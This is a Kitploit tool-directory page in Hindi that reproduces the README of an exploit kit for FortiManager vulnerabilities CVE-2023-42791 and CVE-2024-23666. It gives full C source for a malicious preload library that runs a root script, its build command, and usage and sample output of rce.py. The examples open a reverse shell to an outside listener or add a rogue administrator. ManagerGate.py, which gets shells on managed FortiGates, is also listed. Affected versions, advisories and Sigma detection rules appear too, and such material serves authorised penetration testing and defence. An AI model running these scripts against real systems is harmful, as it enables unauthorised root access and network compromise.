Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-42791_CVE-2024-23666 — CVE-2023-42791 और CVE-2024-23666 के लिए शोषण स्क्रिप्ट। | Kitploit
उपकरण/GitHubGitHub/synacktiv/cve-2023-42791_cve-2024-23666
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
synacktiv/cve-2023-42791_cve-2024-23666

CVE-2023-42791_CVE-2024-23666

CVE-2023-42791 और CVE-2024-23666 के लिए शोषण स्क्रिप्ट।

रिपॉजिटरी देखें
621 साल पहलेअभी तक समीक्षित नहीं

Fortimanager अपर्याप्त प्राधिकरण जाँच (CVE-2024-23666) और असीमित फ़ाइल अपलोड (CVE-2023-42791) शोषण स्क्रिप्ट

इन कमजोरियों का लाभ उठाने वाली दो शोषण स्क्रिप्ट प्रदान की गई हैं:

  • rce.py: FortiManager पर अनप्रिविलेज्ड एक्सेस से रिवर्स शेल प्रदान करता है या एक मनमाना व्यवस्थापक जोड़ता है।
  • ManagerGate.py: रिमोट मैनेज्ड FortiGate SSH सेवाओं से कनेक्ट करने की अनुमति देता है। SSH पासवर्ड अभी भी आवश्यक हैं लेकिन FortiManager कॉन्फ़िगरेशन बैकअप में पाए जा सकते हैं।

अधिक विवरण के लिए, कृपया https://www.synacktiv.com/advisories/advisories/fortimanager-multiple-vulnerabilities पर उपलब्ध संबंधित सलाह देखें।

उपयोग

rce.py

एक दुर्भावनापूर्ण लाइब्रेरी संकलित करें जो /rce.sh चलाएगी:

root@kitploit:~
$ cat rce.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    if (getuid() != 0) return 0;
    unlink("/etc/ld.so.preload");
    if (fork() == 0) {
        setgid(0);
        setuid(0);
        system("/bin/bash /rce.sh");
    }
    return 0;
}

$ gcc -fPIC -shared -o rce.so rce.c -nostartfiles

उपयोग:

root@kitploit:~
$ python3 rce.py -h
usage: rce.py [-h] [-k] [-l LIBRARY] connection {revshell,adduser} ...

positional arguments:
  connection            User, password, and host (user:password@host)

options:
  -h, --help            show this help message and exit
  -k, --insecure        Do not check the remote host certificate (default: False)
  -l LIBRARY, --library LIBRARY
                        Malicious library path (default: /tmp/rce.so)

Action to run:
  {revshell,adduser}
    revshell            Run a Python reverse shell
    adduser             Create a new administrator

रिवर्स शेल प्राप्त करने के लिए:

root@kitploit:~
$ python3 rce.py -k -l ./rce.so lowpriv:[email protected] revshell 10.10.10.100 1234
[+] Login to the FortiManager
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE

FortiManager में एक नया व्यवस्थापक जोड़ने के लिए:

root@kitploit:~
$ python3 rce.py -k -l ./rce.so lowpriv:[email protected] adduser malicious_adm password
[+] Login to the FortiManager
[+] Uploading /create_user.txt
[+] Uploading /rce.sh
[+] Uploading /rce.so
[+] Uploading /etc/ld.so.preload
[+] Login out of the FortiManager to trigger the RCE

ManagerGate.py

root@kitploit:~
$ python3 ManagerGate.py -h
usage: ManagerGate.py [-h] -H HOST -u USER -p PASSWORD [-d DEVICEID] [-i TUNNELIP] [-l] [-x PROXY] -U GU [-v VERBOSE]

get a shell on fortigate

options:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  host of the fortimanager
  -u USER, --user USER  user to connect with to the fortimanager
  -p PASSWORD, --password PASSWORD
                        password to connect to the fortimanager
  -d DEVICEID, --deviceid DEVICEID
                        device oid to get shell
  -i TUNNELIP, --tunnelip TUNNELIP
                        tunnel ip of the fortigate
  -l, --local           local connect to fortimanager
  -x PROXY, --proxy PROXY
                        proxy request
  -U GU, --gu GU        user to connect with to the fortigate
  -v VERBOSE, --verbose VERBOSE

उदाहरण

root@kitploit:~
$ python3 ManagerGate.py -H 10.0.0.1 -u ReadOnlyUser -p MyPassword123 -d 1011 -i 169.254.0.2   -U root

लक्षित FortiGates का डिवाइस OID और टनल IP FortiManager GUI पर पाया जा सकता है।

प्रभावित संस्करण

  • CVE-2023-42791
    • FortiManager ≤ 7.4.0 ≤ 7.2.3 ≤ 7.0.8 ≤ 6.4.12 ≤ 6.2.11
  • CVE-2024-23666
    • FortiManager ≤ 7.4.2 ≤ 7.2.5 ≤ 7.0.12 ≤ 6.4.14
    • FortiAnalyzer ≤ 7.4.2 ≤ 7.2.5 ≤ 7.0.12 ≤ 6.4.14
    • FortiAnalyzer-BigData ≤ 7.4.0 ≤ 7.2.6 7.0.x 6.4.x 6.2.x

सिग्मा डिटेक्शन नियम

इन शोषण स्क्रिप्ट के उपयोग का पता लगाने के उद्देश्य से सिग्मा डिटेक्शन नियम Synacktiv के नियम रिपॉजिटरी में उपलब्ध हैं: https://github.com/synacktiv/synacktiv-rules/tree/main/2025/fortimanager

संदर्भ

  • https://www.synacktiv.com/advisories/advisories/fortimanager-multiple-vulnerabilities
  • https://fortiguard.fortinet.com/psirt/FG-IR-23-189
  • https://fortiguard.fortinet.com/psirt/FG-IR-23-396
टूल डाउनलोड करें